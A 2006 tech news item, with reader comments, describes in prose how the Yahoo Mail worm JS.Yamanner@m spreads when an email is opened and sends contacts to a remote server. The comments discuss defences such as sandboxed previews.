Yahoo e-mail worm infects without user interaction

This site may earn affiliate commissions from the links on this page. Terms of use.

a new type of javascript worm has appeared on yahoo!'s e-mail service that manages to infect a machine without the user having to do anything other than open the e-mail containing it. the worm is called js.yamanner@m, and it takes advantage of a flaw that allows a script to be run from an html e-mail and interface within a user's web browser. when activated, the worm searches lists of contacts, finds the ones that end with yahoo.com and yahoogroups.com, and then transmits the list to a remote server. the user's browser is also directed to the url http://www.av3.net/index.htm.

symantec security response says that this worm works in the same way as mass mailing worms, but manages to get around the need for a user to click a link to trigger the infection. there is currently no patch for the security flaw (though yahoo! says it has already automatically distributed a fix to all yahoo! mail users), and users should block e-mails from av3@yahoo.com as a precaution.

matthew's opinion
this type of worm has the potential to infect a lot more people than your standard worm because it doesn't require the user to do anything other than view the e-mail; luckily yamanner was very low grade and was shut down in time, but who knows what will happen with the next version? a lot of the time users view e-mails because they have no idea if they are spam or not. in the past taking a quick look at a potential spam message has been a relatively safe practice, but with this e-mail you can't even afford to do that if you are on a yahoo! account.

blocking the address so you don't receive the e-mail is the best course of action, but there may be other e-mails out there using the same technique; keep your fingers crossed that your spam filter will collect them all, or that your e-mail service is doing a better job of keeping its anti-virus definitions up-to-date.

user comments 7 comment(s)

safe guards(9:54am est wed jun 14 2006)yahoo could implement an ascii preview of the email. that may help the user know if the email is spam or not.– by ds

another option(11:23am est wed jun 14 2006)would be to make the email preview run within a virtualized sandbox of it's own with limits on system interaction from within the preview pane.

outlook and other email clients could easily do this, it could be an inconvinience to end users, somewhat, but it would stop this type of crap dead in it's tracks. trapping and logging any autorun scripts and the os/api calls they make could be very helpful in preventing this sort of crap.

personally i would like all email viewing whether preview or not to take place within a virtualized sand box that protects the os. browsing too. far too many people blindly click on things until something happens. sandboxing email clients and web browsers would be a big boost to system security. another useful service would be a file integrity scan that tags and scans incoming downloads, such as mp3s or wmfs or jpegs. tagging anything downloaded as execute diabled and then scanning the format of the file, to look for irregularities that might be attempted exploits or simply executable code masquerading as a data file.

in my personal experience, emails with attachments or links are the worst offenders, with embedded html or scripting following close behind. sandboxing the email and browsing environment, and forcing any downloaded content to be both inspected and marked as execute disabled by default would stop many of the most common exploits cold.

of course it's an arms race, malware will mutate and try other tricks.– by highlandcynic

curious george ???(3:48pm est wed jun 14 2006)just to a google search for “virtualized sandbox” you will in depth description. or just boot from knoppix and browse and read your email safely.– by by fellow geek

jscript(9:07pm est wed jun 14 2006)guess this is the bug microsoft issued a patch for yesterday… :] – by jac

microsoft vulnerability(5:54am est thu jun 15 2006)it may use yahoo as a path but, it is a microsoft vulnerability (look at symantec description). i can use my yahoo account because i woke up last year and dumped all ms products in favour of linux and open office etc (oss rules)…. – by no more ms crap

it has been my experience(9:09am est thu jun 15 2006)that ultimately you can not protect people(users) from themselves. if someone is hellbent on destroying themselves (their machine) you can not stop them.

caveat: sometimes they take others down with them and this can usually be prevented. – by luxfestinus